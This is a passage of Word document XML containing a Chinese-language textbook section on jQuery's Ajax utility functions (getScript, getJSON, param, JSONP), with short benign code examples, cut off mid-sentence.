      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该状态码表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求已成功完成，但</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>无法按照期望的方式解析。例如，如果服务器返回的是不符合格式的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档或不符合格式的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>文本时，就会出现该状态码。注意拼写：是</w:t>
      </w:r>
      <w:r>
        <w:t>"parsererror"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"parseerror"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="493" w:name="19_6_2_AjaxGong_Ju_Han_Shu_"/>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Aja</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的其他</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>高级工具不是方法，而是函数，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>直接调用，而不是在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>加载并执行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将其解析为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON,</w:t>
      </w:r>
      <w:r>
        <w:t>并将解析结果传递到指定的回调函数中。这两个函数都会调用一个更通用的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>获取函数：</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>很类似，除了执行的是</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求。与</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>一样，所有这些函数都是异步的：在任何数据加载前它们就会返回调用者，加载结果则通过调用指定的回调函数来通知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.jQuery.getScript()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。它会异步加载文件，加载完成后在全局作用域执行该代码。它能同时适用于同源和跨源脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从其他服务器动态加载脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getScript("http://example.com/js/widget.js");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以传入回调函数作为第二个参数，在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会在代码加载和执行完成后调用一次该回调函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>加载一个类库，并在加载完成时立刻使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getScript("js/jquery.my_plugin.js",function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('div').my_plugin();//</w:t>
      </w:r>
      <w:r>
        <w:t>使用加载的类库</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jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>通常会使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象来获取要执行的脚本内容。但对于跨域请求（脚本存放在与当前文档的不一样的服务器上），</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来加载脚本（参考</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。在同源情况下，回调函数的第一个参数是脚本的文本内容，第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码，第三个参数则是用来获取脚本内容的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在同源情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的返回值也是该</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。对于跨源请求，不存在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>HttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并且脚本的内容获取不到。在这种情况下，回调函数的第一个和第三个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值也是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>的回调函数，仅在请求成功完成时才会被调用。如果需要在发生错误以及成功时都得到通知，则需要使用底层的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。该节描述的其他三个工具函数也是如此。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.jQuery.getJSON()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript</w:t>
      </w:r>
      <w:r>
        <w:t>类似：它会获</w:t>
      </w:r>
      <w:r>
        <w:t>取文本，然后特殊处理一下，再调用指定的回调函数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>获取到文本后，不会将其当做脚本执行，而会将其解析为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>（使用</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.parseJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>函数）。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>只有</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在传入了回调参数时才有用。当成功加载</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，以及将内容成功解析为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>后，解析结果会作为第一个参数传入回调函数中。与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，回调函数的第二个和第三个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>data.</w:t>
      </w:r>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:t>包含文本：</w:t>
      </w:r>
      <w:r>
        <w:t>'{"x":1,"y":2}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getJSON("data.json",function(data){//data</w:t>
      </w:r>
      <w:r>
        <w:t>参数是对象</w:t>
      </w:r>
      <w:r>
        <w:t>{x:1,y:2}</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与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>接受一个可选的数据对象参数，就和传入</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中的一样。如果传入数据到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>中，该数据必须是第二个参数，回调函数则是第三个。如果不传入任何数据，则回调函数可以是第二个参数。如果数据是字符串，则它会被添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>后面。如果数据是一个对象，则它会转化为字符串（参见下面方框中的内容），然后添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>传递数据给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的大多数</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>方法都接受一个参数（或选项）用来指定与</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>一起发送给服务器的数据。通常，该数据的形式是</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>编码的、用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>分隔的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。（这个数据格式就是已知的</w:t>
      </w:r>
      <w:r>
        <w:t>"applicati</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>on/x-www-form-urlencoded"MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。这类似于</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式：一种将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>简单对象与字符串互相转化的格式。）对于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，该数</w:t>
      </w:r>
      <w:r>
        <w:t>据字符串会添加到请求</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面。对于</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，则在所有发送的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求头后面，当做请求的内容体发送它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>获取该格式的数据字符串的一种方式是，调用包含表单或表单元素的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>serialize()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例如，可以使用如下代码来调用</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提交</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#submit_button').click(function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(this.form).load(//</w:t>
      </w:r>
      <w:r>
        <w:t>通过加载新内容来替换表单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.form.action,//</w:t>
      </w:r>
      <w:r>
        <w:t>表单</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(this.form).s</w:t>
      </w:r>
      <w:r>
        <w:t>erialize());//</w:t>
      </w:r>
      <w:r>
        <w:t>将表单数据附加到表单</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>后面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>event.preventDefault();//</w:t>
      </w:r>
      <w:r>
        <w:t>取消掉表单的默认提交</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.disabled="disabled";//</w:t>
      </w:r>
      <w:r>
        <w:t>防止多次提交</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果将</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数的数据参数（或选项）设置为对象而不是字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>通常会调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.param()</w:t>
      </w:r>
      <w:r>
        <w:t>来将对象转化成字符串（除了下面提到的一个异常）。该工具函数会将对象的属性当成名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对，例如，会将对象</w:t>
      </w:r>
      <w:r>
        <w:t>{x:1,y:"hello"}</w:t>
      </w:r>
      <w:r>
        <w:t>转换成字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"x=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>y=hello"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>Query 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.param()</w:t>
      </w:r>
      <w:r>
        <w:t>能处理更复杂的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果对象的某个属性值是数组，该数组中的每一项都会在结果字符</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>串中拥有自己的一个名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对，并且属性名后会添加方括号。如果对象的某个属性值是对象，则内嵌对象的属性名会放置在方括号里并添加到外层属性名中。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.param({a:[1,2,3]})//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"a[]=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>a[]=2</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>a[]=3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.param({o:{x:1,y:true}})//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"o[x]=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>o[y]=true"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.param({o:{x:{y</w:t>
      </w:r>
      <w:r>
        <w:t>:[1,2]}}})//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"o[x][y][]=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>o[x][y][]=2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了后向兼容</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.3</w:t>
      </w:r>
      <w:r>
        <w:t>及其之前的版本，可以传递</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.param()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数，或设置</w:t>
      </w:r>
      <w:r>
        <w:t>traditional</w:t>
      </w:r>
      <w:r>
        <w:t>选项为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。这可以阻止对值为数组或对象的属性进行进一步序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>偶尔，需要将</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>（或一些其他不需要自动转换的对象）作为</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求的内容体传递。在这种情况下，可以设置</w:t>
      </w:r>
      <w:r>
        <w:t>contentType</w:t>
      </w:r>
      <w:r>
        <w:t>选项来指定数据类型，并将</w:t>
      </w:r>
      <w:r>
        <w:t>processData</w:t>
      </w:r>
      <w:r>
        <w:t>选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，以阻止</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>将数据对象传递给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.param()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传递给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>或数据字符串在末尾或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>字符前含有</w:t>
      </w:r>
      <w:r>
        <w:t>“=?”</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，则表明这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。（参考</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的解释。）</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会创建一个回调函数，并用该回调函数的函数名替换掉</w:t>
      </w:r>
      <w:r>
        <w:t>“=?”</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>号，接着</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为就会像请求脚本文件一样，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>静态</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>数据文件无效，它只能与支持</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
